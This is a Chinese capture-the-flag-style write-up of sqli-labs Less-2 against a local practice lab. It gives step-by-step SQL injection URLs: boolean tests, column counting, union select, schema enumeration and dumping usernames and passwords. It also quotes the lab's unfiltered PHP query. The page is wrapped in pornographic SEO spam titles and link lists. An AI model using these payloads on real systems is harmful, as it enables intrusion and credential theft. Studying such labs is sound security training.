老熟女激烈的高潮_日韩一级黄色录像_亚洲1区2区3区视频_精品少妇一区二区三区在线播放_国产欧美日产久久_午夜福利精品导航凹凸

咨詢熱線 :
028-86922220

重慶分公司,新征程啟航

為企業(yè)提供網(wǎng)站建設(shè)、域名注冊、服務(wù)器等服務(wù)

sqli-labs-master第二關(guān):ErrorBased-Intiger

接上篇博客:https://blog.51cto.com/tdcqvip/2060816

成都創(chuàng)新互聯(lián)公司:從2013年成立為各行業(yè)開拓出企業(yè)自己的“網(wǎng)站建設(shè)”服務(wù),為近1000家公司企業(yè)提供了專業(yè)的成都做網(wǎng)站、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計和網(wǎng)站推廣服務(wù), 按需定制由設(shè)計師親自精心設(shè)計,設(shè)計的效果完全按照客戶的要求,并適當(dāng)?shù)奶岢龊侠淼慕ㄗh,擁有的視覺效果,策劃師分析客戶的同行競爭對手,根據(jù)客戶的實際情況給出合理的網(wǎng)站構(gòu)架,制作客戶同行業(yè)具有領(lǐng)先地位的。

來到第二關(guān):

http://127.0.0.1/sqli-labs-master/Less-2/

sqli-labs-master第二關(guān):Error Based- Intiger

訪問http://127.0.0.1/sqli-labs-master/Less-2/?id=1

sqli-labs-master第二關(guān):Error Based- Intiger

判斷是否有注入點:

and 1 = 1 返回正常

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 1 %23

sqli-labs-master第二關(guān):Error Based- Intiger

and 1 = 2 返回失敗

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 2 %23

sqli-labs-master第二關(guān):Error Based- Intiger

說明存在注入點:

order by  n 查看字段

當(dāng)n=3時返回正確

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3  %23

sqli-labs-master第二關(guān):Error Based- Intiger

當(dāng)=4時返回錯誤

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4  %23

sqli-labs-master第二關(guān):Error Based- Intiger

說明字段是3

用union select 進行聯(lián)合查詢:

并用報錯的方式顯示顯示位:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,3  %23

sqli-labs-master第二關(guān):Error Based- Intiger

通過上圖可以看到顯示位在2,3上。

用version()和database()查看php版本和當(dāng)前網(wǎng)站用的數(shù)據(jù)庫名字

sqli-labs-master第二關(guān):Error Based- Intiger

我們通過上圖可以看到數(shù)據(jù)庫是“security” 版本是5.5.53

接下來我們查看數(shù)據(jù)庫security下的表:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23

sqli-labs-master第二關(guān):Error Based- Intiger

通過上圖可以看到有users表

查看users表里的列

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1  union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

sqli-labs-master第二關(guān):Error Based- Intiger

接下來就是查看username和password里的內(nèi)容:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1  union select 1,username,password from users where id = 2 %23

sqli-labs-master第二關(guān):Error Based- Intiger

結(jié)束:

聲明:源代碼被我改動了,所以在注入的時候才會顯示出來查詢語句

接下來看看源代碼:





Less-2 **Error Based- Intiger**







Welcome    Dhakkan 




";

	if($row)
	{
  	echo "";
  	echo 'Your Login name:'. $row['username'];
  	echo "
";
  	echo 'Your Password:' .$row['password'];
  	echo "";
  	}
	else 
	{
	echo '';
	print_r(mysql_error());
	echo "";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>


 



通過源代碼我們可以看到,在連接數(shù)據(jù)庫查詢的時候并沒有進行任何過濾

與第一關(guān)不同的地方就是

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

這句,沒有“''”符號。

利用方式大致相同。

第三關(guān)盡快更新

微信公眾號:

sqli-labs-master第二關(guān):Error Based- Intiger


分享標(biāo)題:sqli-labs-master第二關(guān):ErrorBased-Intiger
文章起源:http://www.xueling.net.cn/article/pjojgo.html

其他資訊

在線咨詢
服務(wù)熱線
服務(wù)熱線:028-86922220
TOP
主站蜘蛛池模板: 久久久久亚洲AV无码尤物 | 久久艹精品 | 超碰公开免费 | 成人爽a毛片免费啪啪 | 佐山爱中文字幕aⅴ在线 | 日本道dvd久久综合 久久亚洲精品国产亚洲老地址 | 久久ww | 国模少妇一区二区三区 | 丰满熟女大屁股水多多 | 午夜a级毛片免费观看 | 国产无人区码卡二卡三卡 | 国产成人久久精品激情91 | 一区二区在线观看免费 | 成人无码区免费a片在线软件 | 国产免费久久久久 | 亚洲综合欧美色五月俺也去 | 国产噜噜噜噜噜久久久久久久久 | 玩弄放荡人妇系列AV在线网站 | 日韩欧美一区二区三区不学 | 4虎av| 一级特黄录像免费播放中文 | 伊人久久大香线蕉AV一区 | 日韩一区免费观看 | 美女一区二区三区在线观看 | 三年片在线观看免费观看大全麻豆 | 久久久国产99久久国产久一 | 一出一进一爽一粗一大视频免费的 | 内地老熟女老少配视频 | 性一交一乱一乱一视频 | 黄网国产 | 久久精品青草 | 夜色资源站www国产在线观看 | 女人喷液全过程在线观看 | 亚洲视频a区 | 一区二区三区免费看A片 | 国产精品久久久久国产a级 乱男乱女www7788 | 九九一级片 | 日本精品免费观看 | 国产美女视频黄a片免费观看软件 | 黄色大片一区 | 法国啄木乌AV片在线播放 |